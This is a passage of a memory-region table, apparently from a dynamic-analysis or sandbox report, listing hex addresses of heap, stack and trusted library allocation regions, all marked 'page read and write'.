|
page read and write
|
||
|
37C1000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
37E8000
|
trusted library allocation
|
page read and write
|
||
|
11ED000
|
heap
|
page read and write
|
||
|
FE6000
|
heap
|
page read and write
|
||
|
13C4000
|
trusted library allocation
|
page read and write
|
||
|
37F7000
|
trusted library allocation
|
page read and write
|
||
|
55C7000
|
trusted library allocation
|
page read and write
|
||
|
6F89000
|
stack
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
118C000
|
stack
|
page read and write
|